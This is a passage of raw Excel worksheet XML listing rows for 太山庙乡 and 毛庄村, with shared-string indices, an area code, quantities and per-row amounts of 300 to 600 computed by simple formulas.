        <v>224</v>
      </c>
      <c r="K2198" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2199" ht="23" customHeight="1" spans="1:11">
      <c r="A2199" s="13" t="s">
        <v>5808</v>
      </c>
      <c r="B2199" s="14" t="str">
        <f>B2198</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2199" s="14" t="str">
        <f>C2198</f>
        <v>毛庄村</v>
      </c>
      <c r="D2199" s="13" t="s">
        <v>5809</v>
      </c>
      <c r="E2199" s="13" t="s">
        <v>5810</v>
      </c>
      <c r="F2199" s="14">
        <f>F2198</f>
        <v>4113210704</v>
      </c>
      <c r="G2199" s="14"/>
      <c r="H2199" s="14"/>
      <c r="I2199" s="14"/>
      <c r="J2199" s="14"/>
      <c r="K2199" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2200" ht="23" customHeight="1" spans="1:11">
      <c r="A2200" s="13" t="s">
        <v>5811</v>
      </c>
      <c r="B2200" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2200" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2200" s="14" t="s">
        <v>5812</v>
      </c>
      <c r="E2200" s="14" t="s">
        <v>5813</v>
      </c>
      <c r="F2200" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2200" s="14">
        <v>1</v>
      </c>
      <c r="H2200" s="14">
        <v>340</v>
      </c>
      <c r="I2200" s="14">
        <f>H2200*G2200</f>
        <v>340</v>
      </c>
      <c r="J2200" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2200" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2201" ht="23" customHeight="1" spans="1:11">
      <c r="A2201" s="13" t="s">
        <v>5814</v>
      </c>
      <c r="B2201" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2201" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2201" s="14" t="s">
        <v>5815</v>
      </c>
      <c r="E2201" s="14" t="s">
        <v>5594</v>
      </c>
      <c r="F2201" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2201" s="14">
        <v>1</v>
      </c>
      <c r="H2201" s="14">
        <v>340</v>
      </c>
      <c r="I2201" s="14">
        <f>H2201*G2201</f>
        <v>340</v>
      </c>
      <c r="J2201" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2201" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2202" ht="23" customHeight="1" spans="1:11">
      <c r="A2202" s="13" t="s">
        <v>5816</v>
      </c>
      <c r="B2202" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2202" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2202" s="14" t="s">
        <v>5817</v>
      </c>
      <c r="E2202" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2202" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2202" s="14">
        <v>2</v>
      </c>
      <c r="H2202" s="14">
        <v>300</v>
      </c>
      <c r="I2202" s="14">
        <f>H2202*G2202</f>
        <v>600</v>
      </c>
      <c r="J2202" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2202" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2203" ht="23" customHeight="1" spans="1:11">
      <c r="A2203" s="13" t="s">
        <v>5818</v>
      </c>
      <c r="B2203" s="14" t="str">
        <f>B2202</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2203" s="14" t="str">
        <f>C2202</f>
        <v>毛庄村</v>
      </c>
      <c r="D2203" s="13" t="s">
        <v>5819</v>
      </c>
      <c r="E2203" s="13" t="s">
        <v>5701</v>
      </c>
      <c r="F2203" s="14">
        <f>F2202</f>
        <v>4113210704</v>
      </c>
      <c r="G2203" s="14"/>
      <c r="H2203" s="14"/>
      <c r="I2203" s="14"/>
      <c r="J2203" s="14"/>
      <c r="K2203" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2204" ht="23" customHeight="1" spans="1:11">
      <c r="A2204" s="13" t="s">
        <v>5820</v>
      </c>
      <c r="B2204" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2204" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2204" s="14" t="s">
        <v>5821</v>
      </c>
      <c r="E2204" s="14" t="s">
        <v>5822</v>
      </c>
      <c r="F2204" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2204" s="14">
        <v>2</v>
      </c>
      <c r="H2204" s="14">
        <v>300</v>
      </c>
      <c r="I2204" s="14">
        <f>H2204*G2204</f>
        <v>600</v>
      </c>
      <c r="J2204" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2204" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2205" ht="23" customHeight="1" spans="1:11">
      <c r="A2205" s="13" t="s">
        <v>5823</v>
      </c>
      <c r="B2205" s="14" t="str">
        <f>B2204</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2205" s="14" t="str">
        <f>C2204</f>
        <v>毛庄村</v>
      </c>
      <c r="D2205" s="13" t="s">
        <v>5824</v>
      </c>
      <c r="E2205" s="13" t="s">
        <v>5825</v>
      </c>
      <c r="F2205" s="14">
        <f>F2204</f>
        <v>4113210704</v>
      </c>
      <c r="G2205" s="14"/>
      <c r="H2205" s="14"/>
      <c r="I2205" s="14"/>
      <c r="J2205" s="14"/>
      <c r="K2205" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2206" ht="23" customHeight="1" spans="1:11">
      <c r="A2206" s="13" t="s">
        <v>5826</v>
      </c>
      <c r="B2206" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2206" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2206" s="14" t="s">
        <v>5827</v>
      </c>
      <c r="E2206" s="14" t="s">
        <v>5636</v>
      </c>
      <c r="F2206" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2206" s="14">
        <v>1</v>
      </c>
      <c r="H2206" s="14">
        <v>340</v>
      </c>
      <c r="I2206" s="14">
        <f>H2206*G2206</f>
        <v>340</v>
      </c>
      <c r="J2206" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2206" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2207" ht="23" customHeight="1" spans="1:11">
      <c r="A2207" s="13" t="s">
        <v>5828</v>
      </c>
      <c r="B2207" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2207" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2207" s="14" t="s">
        <v>5829</v>
      </c>
      <c r="E2207" s="14" t="s">
        <v>5830</v>
      </c>
      <c r="F2207" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2207" s="14">
        <v>1</v>
      </c>
      <c r="H2207" s="14">
        <v>340</v>
      </c>
      <c r="I2207" s="14">
        <f>H2207*G2207</f>
        <v>340</v>
      </c>
      <c r="J2207" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2207" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2208" ht="23" customHeight="1" spans="1:11">
      <c r="A2208" s="13" t="s">
        <v>5831</v>
      </c>
      <c r="B2208" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2208" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2208" s="14" t="s">
        <v>5832</v>
      </c>
      <c r="E2208" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2208" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2208" s="14">
        <v>2</v>
      </c>
      <c r="H2208" s="14">
        <v>300</v>
      </c>
      <c r="I2208" s="14">
        <f>H2208*G2208</f>
        <v>600</v>
      </c>
      <c r="J2208" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2208" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2209" ht="23" customHeight="1" spans="1:11">
      <c r="A2209" s="13" t="s">
        <v>5833</v>
      </c>
      <c r="B2209" s="14" t="str">
        <f>B2208</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2209" s="14" t="str">
        <f>C2208</f>
        <v>毛庄村</v>
      </c>
      <c r="D2209" s="18" t="s">
        <v>5834</v>
      </c>
      <c r="E2209" s="18" t="s">
        <v>3365</v>
      </c>
      <c r="F2209" s="14">
        <f>F2208</f>
        <v>4113210704</v>
      </c>
      <c r="G2209" s="14"/>
      <c r="H2209" s="14"/>
      <c r="I2209" s="14"/>
      <c r="J2209" s="14"/>
      <c r="K2209" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2210" ht="23" customHeight="1" spans="1:11">
      <c r="A2210" s="13" t="s">
        <v>5835</v>
      </c>
      <c r="B2210" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2210" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2210" s="14" t="s">
        <v>5836</v>
      </c>
      <c r="E2210" s="14" t="s">
        <v>5837</v>
      </c>
      <c r="F2210" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2210" s="14">
        <v>1</v>
      </c>
      <c r="H2210" s="14">
        <v>340</v>
      </c>
      <c r="I2210" s="14">
        <f>H2210*G2210</f>
        <v>340</v>
      </c>
      <c r="J2210" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2210" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2211" ht="23" customHeight="1" spans="1:11">
      <c r="A2211" s="13" t="s">
        <v>5838</v>
      </c>
      <c r="B2211" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2211" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2211" s="14" t="s">
        <v>5839</v>
      </c>
      <c r="E2211" s="14" t="s">
        <v>5701</v>
      </c>
      <c r="F2211" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2211" s="14">
        <v>1</v>
      </c>
      <c r="H2211" s="14">
        <v>340</v>
      </c>
      <c r="I2211" s="14">
        <f>H2211*G2211</f>
        <v>340</v>
      </c>
      <c r="J2211" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2211" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2212" ht="23" customHeight="1" spans="1:11">
      <c r="A2212" s="13" t="s">
        <v>5840</v>
      </c>
      <c r="B2212" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2212" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2212" s="14" t="s">
        <v>5841</v>
      </c>
      <c r="E2212" s="14" t="s">
        <v>5631</v>
      </c>
      <c r="F2212" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2212" s="14">
        <v>2</v>
      </c>
      <c r="H2212" s="14">
        <v>300</v>
      </c>
      <c r="I2212" s="14">
        <f>H2212*G2212</f>
        <v>600</v>
      </c>
      <c r="J2212" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2212" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2213" ht="23" customHeight="1" spans="1:11">
      <c r="A2213" s="13" t="s">
        <v>5842</v>
      </c>
      <c r="B2213" s="14" t="str">
        <f>B2212</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2213" s="14" t="str">
        <f>C2212</f>
        <v>毛庄村</v>
      </c>
      <c r="D2213" s="13" t="s">
        <v>5843</v>
      </c>
      <c r="E2213" s="13" t="s">
        <v>5694</v>
      </c>
      <c r="F2213" s="14">
        <f>F2212</f>
        <v>4113210704</v>
      </c>
      <c r="G2213" s="14"/>
      <c r="H2213" s="14"/>
      <c r="I2213" s="14"/>
      <c r="J2213" s="14"/>
      <c r="K2213" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2214" ht="23" customHeight="1" spans="1:11">
      <c r="A2214" s="13" t="s">
        <v>5844</v>
      </c>
      <c r="B2214" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2214" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2214" s="14" t="s">
        <v>5845</v>
      </c>
      <c r="E2214" s="14" t="s">
        <v>5846</v>
      </c>
      <c r="F2214" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2214" s="14">
        <v>2</v>
      </c>
      <c r="H2214" s="14">
        <v>300</v>
      </c>
      <c r="I2214" s="14">
        <f>H2214*G2214</f>
        <v>600</v>
      </c>
      <c r="J2214" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2214" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2215" ht="23" customHeight="1" spans="1:11">
      <c r="A2215" s="13" t="s">
        <v>5847</v>
      </c>
      <c r="B2215" s="14" t="str">
        <f>B2214</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2215" s="14" t="str">
        <f>C2214</f>
        <v>毛庄村</v>
      </c>
      <c r="D2215" s="13" t="s">
        <v>5848</v>
      </c>
      <c r="E2215" s="13" t="s">
        <v>5675</v>
      </c>
      <c r="F2215" s="14">
        <f>F2214</f>
        <v>4113210704</v>
      </c>
      <c r="G2215" s="14"/>
      <c r="H2215" s="14"/>
      <c r="I2215" s="14"/>
      <c r="J2215" s="14"/>
      <c r="K2215" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2216" ht="23" customHeight="1" spans="1:11">
      <c r="A2216" s="13" t="s">
        <v>5849</v>
      </c>
      <c r="B2216" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2216" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2216" s="14" t="s">
        <v>5850</v>
      </c>
      <c r="E2216" s="14" t="s">
        <v>5685</v>
      </c>
      <c r="F2216" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2216" s="14">
        <v>2</v>
      </c>
      <c r="H2216" s="14">
        <v>300</v>
      </c>
      <c r="I2216" s="14">
        <f>H2216*G2216</f>
        <v>600</v>
      </c>
      <c r="J2216" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2216" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2217" ht="23" customHeight="1" spans="1:11">
      <c r="A2217" s="13" t="s">
        <v>5851</v>
      </c>
      <c r="B2217" s="14" t="str">
        <f>B2216</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2217" s="14" t="str">
        <f>C2216</f>
        <v>毛庄村</v>
      </c>
      <c r="D2217" s="13" t="s">
        <v>5852</v>
      </c>
      <c r="E2217" s="13" t="s">
        <v>3365</v>
      </c>
      <c r="F2217" s="14">
        <f>F2216</f>
        <v>4113210704</v>
      </c>
      <c r="G2217" s="14"/>
      <c r="H2217" s="14"/>
      <c r="I2217" s="14"/>
      <c r="J2217" s="14"/>
      <c r="K2217" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2218" ht="23" customHeight="1" spans="1:11">
      <c r="A2218" s="13" t="s">
        <v>5853</v>
      </c>
      <c r="B2218" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2218" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2218" s="14" t="s">
        <v>5854</v>
      </c>
      <c r="E2218" s="14" t="s">
        <v>5846</v>
      </c>
      <c r="F2218" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2218" s="14">
        <v>1</v>
      </c>
      <c r="H2218" s="14">
        <v>340</v>
      </c>
      <c r="I2218" s="14">
        <f>H2218*G2218</f>
        <v>340</v>
      </c>
      <c r="J2218" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2218" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2219" ht="23" customHeight="1" spans="1:11">
      <c r="A2219" s="13" t="s">
        <v>5855</v>
      </c>
      <c r="B2219" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2219" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2219" s="14" t="s">
        <v>5856</v>
      </c>
      <c r="E2219" s="14" t="s">
        <v>3633</v>
      </c>
      <c r="F2219" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2219" s="14">
        <v>2</v>
      </c>
      <c r="H2219" s="14">
        <v>300</v>
      </c>
      <c r="I2219" s="14">
        <f>H2219*G2219</f>
        <v>600</v>
      </c>
      <c r="J2219" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2219" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2220" ht="23" customHeight="1" spans="1:11">
      <c r="A2220" s="13" t="s">
        <v>5857</v>
      </c>
      <c r="B2220" s="14" t="str">
        <f>B2219</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2220" s="14" t="str">
        <f>C2219</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2220" s="13" t="s">
        <v>5858</v>
      </c>
      <c r="E2220" s="13" t="s">
        <v>5628</v>
      </c>
      <c r="F2220" s="14">
        <f>F2219</f>
        <v>4113210704</v>
      </c>
      <c r="G2220" s="14"/>
      <c r="H2220" s="14"/>
      <c r="I2220" s="14"/>
      <c r="J2220" s="14"/>
      <c r="K2220" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2221" ht="23" customHeight="1" spans="1:11">
      <c r="A2221" s="13" t="s">
        <v>5859</v>
      </c>
      <c r="B2221" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2221" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2221" s="14" t="s">
        <v>5860</v>
      </c>
      <c r="E2221" s="14" t="s">
        <v>5639</v>
      </c>
      <c r="F2221" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2221" s="14">
        <v>2</v>
      </c>
      <c r="H2221" s="14">
        <v>300</v>
      </c>
      <c r="I2221" s="14">
        <f>H2221*G2221</f>
        <v>600</v>
      </c>
      <c r="J2221" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2221" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2222" ht="23" customHeight="1" spans="1:11">
      <c r="A2222" s="13" t="s">
        <v>5861</v>
      </c>
      <c r="B2222" s="14" t="str">
        <f>B2221</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2222" s="14" t="str">
        <f>C2221</f>
        <v>毛庄村</v>
      </c>
      <c r="D2222" s="13" t="s">
        <v>5862</v>
      </c>
      <c r="E2222" s="13" t="s">
        <v>3365</v>
      </c>
      <c r="F2222" s="14">
        <f>F2221</f>
        <v>4113210704</v>
      </c>
      <c r="G2222" s="14"/>
      <c r="H2222" s="14"/>
      <c r="I2222" s="14"/>
      <c r="J2222" s="14"/>
      <c r="K2222" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2223" ht="23" customHeight="1" spans="1:11">
      <c r="A2223" s="13" t="s">
        <v>5863</v>
      </c>
      <c r="B2223" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2223" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2223" s="14" t="s">
        <v>5864</v>
      </c>
      <c r="E2223" s="14" t="s">
        <v>5631</v>
      </c>
      <c r="F2223" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2223" s="14">
        <v>1</v>
      </c>
      <c r="H2223" s="14">
        <v>340</v>
      </c>
      <c r="I2223" s="14">
        <f>H2223*G2223</f>
        <v>340</v>
      </c>
      <c r="J2223" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2223" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2224" ht="23" customHeight="1" spans="1:11">
      <c r="A2224" s="13" t="s">
        <v>5865</v>
      </c>
      <c r="B2224" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2224" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2224" s="14" t="s">
        <v>5866</v>
      </c>
      <c r="E2224" s="14" t="s">
        <v>5789</v>
      </c>
      <c r="F2224" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2224" s="14">
        <v>1</v>
      </c>
      <c r="H2224" s="14">
        <v>340</v>
      </c>
      <c r="I2224" s="14">
        <f>H2224*G2224</f>
        <v>340</v>
      </c>
      <c r="J2224" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2224" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2225" ht="23" customHeight="1" spans="1:11">
      <c r="A2225" s="13" t="s">
        <v>5867</v>
      </c>
      <c r="B2225" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2225" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2225" s="14" t="s">
        <v>5868</v>
      </c>
      <c r="E2225" s="14" t="s">
        <v>5869</v>
      </c>
      <c r="F2225" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2225" s="14">
        <v>2</v>
      </c>
      <c r="H2225" s="14">
        <v>300</v>
      </c>
      <c r="I2225" s="14">
        <f>H2225*G2225</f>
        <v>600</v>
      </c>
      <c r="J2225" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2225" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2226" ht="23" customHeight="1" spans="1:11">
      <c r="A2226" s="13" t="s">
        <v>5870</v>
      </c>
      <c r="B2226" s="14" t="str">
        <f>B2225</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2226" s="14" t="str">
        <f>C2225</f>
        <v>毛庄村</v>
      </c>
      <c r="D2226" s="13" t="s">
        <v>5871</v>
      </c>
      <c r="E2226" s="13" t="s">
        <v>5580</v>
      </c>
      <c r="F2226" s="14">
        <f>F2225</f>
        <v>4113210704</v>
      </c>
      <c r="G2226" s="14"/>
      <c r="H2226" s="14"/>
      <c r="I2226" s="14"/>
      <c r="J2226" s="14"/>
      <c r="K2226" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2227" ht="23" customHeight="1" spans="1:11">
      <c r="A2227" s="13" t="s">
        <v>5872</v>
      </c>
      <c r="B2227" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2227" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2227" s="14" t="s">
        <v>5873</v>
      </c>
      <c r="E2227" s="14" t="s">
        <v>5874</v>
      </c>
      <c r="F2227" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2227" s="14">
        <v>1</v>
      </c>
      <c r="H2227" s="14">
        <v>340</v>
      </c>
      <c r="I2227" s="14">
        <f>H2227*G2227</f>
        <v>340</v>
      </c>
      <c r="J2227" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2227" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2228" ht="23" customHeight="1" spans="1:11">
      <c r="A2228" s="13" t="s">
        <v>5875</v>
      </c>
      <c r="B2228" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2228" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2228" s="14" t="s">
        <v>5876</v>
      </c>
      <c r="E2228" s="14" t="s">
        <v>5877</v>
      </c>
      <c r="F2228" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2228" s="14">
        <v>1</v>
      </c>
      <c r="H2228" s="14">
        <v>340</v>
      </c>
      <c r="I2228" s="14">
        <f>H2228*G2228</f>
        <v>340</v>
      </c>
      <c r="J2228" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2228" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2229" ht="23" customHeight="1" spans="1:11">
      <c r="A2229" s="13" t="s">
        <v>5878</v>
      </c>
      <c r="B2229" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2229" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2229" s="14" t="s">
        <v>5879</v>
      </c>
      <c r="E2229" s="14" t="s">
        <v>5701</v>
      </c>
      <c r="F2229" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2229" s="14">
        <v>1</v>
      </c>
      <c r="H2229" s="14">
        <v>340</v>
      </c>
      <c r="I2229" s="14">
        <f>H2229*G2229</f>
        <v>340</v>
      </c>
      <c r="J2229" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2229" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2230" ht="23" customHeight="1" spans="1:11">
      <c r="A2230" s="13" t="s">
        <v>5880</v>
      </c>
      <c r="B2230" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2230" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2230" s="14" t="s">
        <v>5881</v>
      </c>
      <c r="E2230" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2230" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2230" s="14">
        <v>2</v>
      </c>
      <c r="H2230" s="14">
        <v>300</v>
      </c>
      <c r="I2230" s="14">
        <f>H2230*G2230</f>
        <v>600</v>
      </c>
      <c r="J2230" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2230" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2231" ht="23" customHeight="1" spans="1:11">
      <c r="A2231" s="13" t="s">
        <v>5882</v>
      </c>
      <c r="B2231" s="14" t="str">
        <f>B2230</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2231" s="14" t="str">
        <f>C2230</f>
        <v>毛庄村</v>
      </c>
      <c r="D2231" s="13" t="s">
        <v>5883</v>
      </c>
      <c r="E2231" s="13" t="s">
        <v>2879</v>
      </c>
      <c r="F2231" s="14">
        <f>F2230</f>
        <v>4113210704</v>
      </c>
      <c r="G2231" s="14"/>
      <c r="H2231" s="14"/>
      <c r="I2231" s="14"/>
      <c r="J2231" s="14"/>
      <c r="K2231" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2232" ht="23" customHeight="1" spans="1:11">
      <c r="A2232" s="13" t="s">
        <v>5884</v>
      </c>
      <c r="B2232" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2232" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2232" s="14" t="s">
        <v>5885</v>
      </c>
      <c r="E2232" s="14" t="s">
        <v>5688</v>
      </c>
      <c r="F2232" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2232" s="14">
        <v>1</v>
      </c>
      <c r="H2232" s="14">
        <v>340</v>
      </c>
      <c r="I2232" s="14">
        <f t="shared" ref="I2232:I2242" si="107">H2232*G2232</f>
        <v>340</v>
      </c>
      <c r="J2232" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2232" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2233" ht="23" customHeight="1" spans="1:11">
      <c r="A2233" s="13" t="s">
        <v>5886</v>
      </c>
      <c r="B2233" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2233" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2233" s="14" t="s">
        <v>5887</v>
      </c>
      <c r="E2233" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2233" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2233" s="14">
        <v>1</v>
      </c>
      <c r="H2233" s="14">
        <v>340</v>
      </c>
      <c r="I2233" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2233" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2233" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2234" ht="23" customHeight="1" spans="1:11">
      <c r="A2234" s="13" t="s">
        <v>5888</v>
      </c>
      <c r="B2234" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2234" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2234" s="14" t="s">
        <v>5889</v>
      </c>
      <c r="E2234" s="14" t="s">
        <v>5738</v>
      </c>
      <c r="F2234" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2234" s="14">
        <v>1</v>
      </c>
      <c r="H2234" s="14">
        <v>340</v>
      </c>
      <c r="I2234" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2234" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2234" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2235" ht="23" customHeight="1" spans="1:11">
      <c r="A2235" s="13" t="s">
        <v>5890</v>
      </c>
      <c r="B2235" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2235" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2235" s="14" t="s">
        <v>5891</v>
      </c>
      <c r="E2235" s="14" t="s">
        <v>5869</v>
      </c>
      <c r="F2235" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2235" s="14">
        <v>1</v>
      </c>
      <c r="H2235" s="14">
        <v>340</v>
      </c>
      <c r="I2235" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2235" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2235" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2236" ht="23" customHeight="1" spans="1:11">
      <c r="A2236" s="13" t="s">
        <v>5892</v>
      </c>
      <c r="B2236" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2236" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2236" s="14" t="s">
        <v>5893</v>
      </c>
      <c r="E2236" s="14" t="s">
        <v>5716</v>
      </c>
      <c r="F2236" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2236" s="14">
        <v>1</v>
      </c>
      <c r="H2236" s="14">
        <v>340</v>
      </c>
      <c r="I2236" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2236" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2236" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2237" ht="23" customHeight="1" spans="1:11">
      <c r="A2237" s="13" t="s">
        <v>5894</v>
      </c>
      <c r="B2237" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2237" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2237" s="14" t="s">
        <v>5895</v>
      </c>
      <c r="E2237" s="14" t="s">
        <v>5738</v>
      </c>
      <c r="F2237" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2237" s="14">
        <v>1</v>
      </c>
      <c r="H2237" s="14">
        <v>340</v>
      </c>
      <c r="I2237" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
